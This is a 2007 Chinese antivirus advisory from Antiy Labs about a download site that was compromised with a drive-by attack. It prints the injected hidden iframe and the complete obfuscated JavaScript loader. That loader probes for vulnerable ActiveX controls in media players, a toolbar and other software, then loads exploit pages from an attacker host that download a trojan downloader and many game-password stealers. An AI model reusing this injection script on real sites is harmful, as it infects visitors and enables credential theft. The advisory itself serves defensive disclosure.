安全响应·Security
|
服务之窗下载站挂马事件
出处:安天实验室 2007-12-20 11:00
 内容: |
| |
12月20日,安天实验室反病毒监测网发现,服务之窗下载站(http://www.
th***.com/down/index.htm)被黑客植入病毒,用户如果访问该网站,会被病
毒感染。系统就会自动从恶意网站上下载并运行恶意程序。被感染病毒的用户
可能被远程控制,盗取用户敏感信息。
该网站的主页里被插入如下循环框架:
<iframe src=http://ji101.3***.org/003.htm width=1 height=1
frameborder=0></iframe>
http://ji101.3***.org/003.htm插入以下代码:
<script src="zl/vip.js"></script>
zl/vip.js代码:
var Then=new Date();asdfasf="fldsajfldsajflas";
Then.setTime(Then.getTime()+24*60*60*1000);
var cookieString=new String(document.cookie);
var cookieHeader="Cookie1=";
asdfasf="fldsajfldsajflas";
var beginPosition=cookieString.indexOf(cookieHeader);
document.write('<iframe style=display:none
src="http://ji101.3***.org/zl/real.gif"></iframe>');
asdfasf="fldsajfldsajflas";
if(beginPosition==-1){asdfasf="fldsajfldsajflas";
document.cookie="Cookie1=POPWINDOS;
expires="+Then.toGMTString();
try{if(new ActiveXObject("Microsoft.XMLHTTP"))document.
write('<script src="http://ji101.3***.org/zl/xpkk.js">
</script>')}catch(e){}try{if(new ActiveXObject
("DPClient.Vod"))document.
write('<iframe style=display:none
src="http://ji101.3***.org/zl/tok.gif"></iframe>')}
catch(e){}try{if(new ActiveXObject
("MPS.StormPlayer.1"))document.
write('<iframe style=display:none
src="http://ji101.3***.org/zl/xpbf.gif">
</iframe>')}catch(e){}try{if(new
ActiveXObject("e.PowerPlayerCtrl.1"))document.
write('<iframe style=display:none
src="http://ji101.3***.org/zl/pps.gif"></iframe>')}
catch(e){}try{if(new ActiveXObject("Pdg2"))document.
write('<iframe style=display:none
src="http://ji101.3***.org/zl/reader.gif">
</iframe>')}catch(e){}
try{if(new ActiveXObject("GLCHAT.GLChatCtrl.1"))
document.write('<iframe style=display:none
src="http://ji101.3***.org/zl/xplz.gif"></iframe>')}
catch(e){}try{if(new ActiveXObject
("BaiduBar.Tool.1"))document.
write('<iframe style=display:none
src="http://ji101.3***.org/zl/baidu.gif"></iframe>')}
catch(e){}}
利用realpaly漏洞;Microsoft.XMLHTTP漏洞;
DPClient.Vod迅雷漏洞;MPS.StormPlayer.1暴风影音漏洞;
PowerPlayerCtrl.1DVD播放器漏洞;Pdg2 超星阅览器漏洞;
GLCHAT.GLChatCtrl.1联众大厅漏洞;
BaiduBar.Tool.1百度超级搜霸漏洞,
其目的连接地址http://ji101.3***.org/zl/test.exe
下载文件test.exe。
当用户访问http://www.th***.com/down/index.htm时,
系统会自动隐藏下载以下病毒文件:
http://ji101.3***.org/zl/test.exe
病毒名:(Trojan-Downloader.win32.webd.thf) 下载者木马
以上病毒文件为下载者木马,运行后会下载大量的恶意文件!
http://zy****.com/xz/1.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.oaa) 盗号木马
http://zy****.com/xz/2.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.idb) 盗号木马
http://zy****.com/xz/3.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ert) 盗号木马
http://zy****.com/xz/4.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.mkc) 盗号木马
http://zy****.com/xz/5.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ews) 盗号木马
http://zy****.com/xz/6.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.isb) 盗号木马
http://zy****.com/xz/7.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.kvg) 盗号木马
http://zy****.com/xz/8.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.isb) 盗号木马
http://zy****.com/xz/9.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.lcw) 盗号木马
http://zy****.com/xz/10.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.lgo) 盗号木马
http://zy****.com/xz/11.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.ldc) 盗号木马
http://zy****.com/xz/12.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.axv) 盗号木马
http://zy****.com/xz/13.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.kpo) 盗号木马
http://zy****.com/xz/14.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.hgf) 盗号木马
http://zy****.com/xz/15.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.web) 盗号木马
http://zy****.com/xz/16.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.wed) 盗号木马
http://zy****.com/xz/17.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.www) 盗号木马
http://zy****.com/xz/18.exe
病毒名:(Trojan-PSW.Win32.OnLineGames.lfx) 盗号木马
http://zy****.com/xz/19.exe
病毒名:(Trojan-PSW.Win32.WOW.ahf) 盗号木马
|
| 附: |
| |
点击此处下载木马防线2005+
 病毒上报信箱: submit@virusview.net
|
|
